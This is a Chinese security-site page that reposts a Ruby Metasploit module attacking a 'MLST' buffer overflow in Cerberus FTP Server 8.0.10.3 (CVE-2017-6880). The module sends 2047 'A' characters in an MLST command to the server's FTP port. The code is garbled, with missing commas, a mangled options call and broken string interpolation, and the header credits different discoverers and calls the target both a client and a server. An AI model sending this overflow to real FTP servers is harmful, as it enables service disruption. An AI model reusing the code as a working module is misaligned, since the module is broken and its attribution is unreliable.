首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>Exploits>文章内容
Cerberus FTP 8.0.10.3 MLST Buffer Overflow
来源:metasploit.com 作者:Sardar 发布时间:2017-05-16  

#!/usr/share/ruby

#[+] Title: Cerberus FTP Server 8.0.10.3 a 'MLST' Remote Buffer Overflow
#[+] Credits / Discovery: Nassim Asrir
#[+] Author Contact: wassline@gmail.com || https://www.linkedin.com/in/nassim-asrir-b73a57122/
#[+] Metasploit Module Author : Souhardya Sardar
#[+] Metasploit Module Author Contact: github.com/Souhardya | Souhardya.sardar@protonmail.com
#[+] Author Company: Henceforth
#[+] CVE: CVE-2017-6880

#Vendor:
#===============
#
#https://www.cerberusftp.com/
 
 
#Download:
#===========
#
#https://www.cerberusftp.com/files/CerberusInstall.exe (32-Bit)
 
 
#Vulnerability Type:
#===================
#
#Remote Buffer Overflow.

 

# ----------------------------
# Module Dependencies/requires
# ----------------------------

require 'msf/core'

# ----------------------------------
# Metasploit Class name and includes
# ----------------------------------

class Metasploit3 < Msf::Exploit::Remote
 Rank = NormalRanking
 
 include Msf::Exploit::Remote::Ftp

# -----------------------------------------
# Initialize information
# -----------------------------------------
 
 def initialize(info = {})
 super(update_info(info,
 'Name' => 'Cerber FTP Remote Buffer Overflow ',
 'Description' => %q{
 This module exploits a buffer overflow in the Cerber FTP client that is triggered
 by sending a bad char "A" in the command "MLST" (2047) .
 },
 
 'Author' =>
 [
 'Module Author And Bug Discovered by : Peter Baris',
 'Coded by : Souhardya Sardar (github.com/Souhardya)', #metasploit module :)
 'Thanks to : Nidhish Pandya ', #auditing:)
 
 
 ],
 'License' => NONE,
 'Platform' => ['win']
 
 'References' =>
 [
 [ 'CVE', 'CVE-2017-6880' ],
 [ Reference code taken from original POC located here :- https://www.exploit-db.com/exploits/41620/ ]
 
 ]))
 
 register_optionsOptPort.new('SRVPORT', [true, "The remote FTP server port", 21])
 ], self.class)
 deregister_options('FTPUSER', 'FTPPASS')
 end

 def exploit
 connect
 
 payload = "A"*2047
 
 print_status("Trying to connect to target server {target.name...")

 
 sock.put('MLST ' + payload + '\r\n')
 
 handler
 disconnect
 end
 
end


 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Apache 2.2.0 - 2.2.11 Remote e
·VideoScript 3.0 <= 4.0.1.50 Of
·Yahoo! Messenger Webcam 8.1 Ac
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1
  相关文章
·Microsoft Windows 7 Kernel - '
·Microsoft Windows 10 Kernel -
·LabF nfsAxe 3.7 FTP Client - B
·Microsoft Windows 7 Kernel - U
·MobaXtrem 10.2 Remote Code Exe
·Larson VizEx Reader 9.7.5 - Lo
·Mozilla Firefox 55 Denial Of S
·Halliburton LogView Pro 10.0.1
·Apple iOS < 10.3.2 - Notificat
·Quest Privilege Manager pmmast
·Microsoft Windows - COM Aggreg
·miniupnpc 2.0.20170421 Denial
  推荐广告
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved